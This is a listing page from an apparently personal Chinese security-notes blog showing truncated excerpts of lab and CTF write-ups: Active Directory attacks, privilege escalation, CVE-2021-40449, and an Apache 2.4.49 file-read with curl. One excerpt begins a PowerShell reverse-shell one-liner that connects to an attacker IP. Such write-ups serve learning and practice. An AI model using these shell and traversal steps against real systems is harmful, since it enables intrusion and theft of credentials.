zhyann的头像-白鸢的笔记
管理员
这家伙很懒,什么都没有写...
disk组提权-白鸢的笔记

disk组提权

https://vk9-sec.com/disk-group-privilege-escalation/?source=post_page-----b14a6e535e1f-------------------------------- 1. 首先查看属于我们组的硬盘ls -l /dev 2. 查看/root属于那个...
Active Directory 中的横向移动4 Pass the Ticket-白鸢的笔记

Active Directory 中的横向移动4 Pass the Ticket

传递票证攻击利用了 TGS,它可以导出并重新注入到网络的其他位置,然后用于对特定服务进行身份验证。此外,如果服务票证属于当前用户,则不需要管理权限。在这种情况下,我们将滥用 dave 已有的...
1年前
01078
Objective 17-白鸢的笔记

Objective 17

任务• 在 dcorp 域中找到我们具有写入权限的计算机对象。• 滥用写入权限以域管理员身份访问该计算机。 Find-InterestingDomainAcl | ?{$_.identityreferencename -match 'ciadim'}空的 在Je...
11个月前
010610
Objective 7-白鸢的笔记

Objective 7

任务确定目标域中存在域管理会话的计算机入侵计算机并将权限提升至域管理员 - 使用对 dcorp-ci 的访问权限 - 使用派生的本地管理员 C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat . C:\...
11个月前
01057
powershell反弹shell制作-白鸢的笔记

powershell反弹shell制作

Kali使用pwsh编译$Text = '$client = New-Object System.Net.Sockets.TCPClient('192.168.45.211',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.R...
Forest rpc用户枚举 AS-REP Roasting 域内权限提升-白鸢的笔记

Forest rpc用户枚举 AS-REP Roasting 域内权限提升

简介ForestDifficulty Easy 实验环境攻击者 Kali 10.10.16.20受害者 IP 10.10.10.161 Windows 1. 信息收集PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerb...
1年前
01035
Exfiltrated-白鸢的笔记

Exfiltrated

简介point 10Warm upDifficulty Easyrated by community INTERMEDIATE Attack and exfiltrate the target! 实验环境攻击者 Kali 192.168.45.200受害者 IP 192.168.186.163   Linux 1. 信息...
案例:鸢尾花种类预测--数据集介绍-白鸢的笔记

案例:鸢尾花种类预测–数据集介绍

本实验介绍了使用Python进行机器学习的一些基本概念。 在本案例中,将使用K-Nearest Neighbor(KNN)算法对鸢尾花的种类进行分类,并测量花的特征。本案例目的:遵循并理解完整的机器学习过程对...
CVE-2021-40449-白鸢的笔记

CVE-2021-40449

实验实验环境Windows10 受害者 192.168.192.147  使用wesng发现有CVE-2021-40449漏洞Kali 攻击者 192.168.192.128python wes.py systeminfo.txt -o win10.csv cat win10.csv | grep 'CVE-2021-...
对curl进行URL编码-白鸢的笔记

对curl进行URL编码

目标IP为:192.168.174.16web服务器为Apache httpd 2.4.49https://www.exploit-db.com/exploits/50383现在192.168.174.16在cgi-bin有文件包含漏洞 尝试用curl得到/opt/passwordscurl http://192...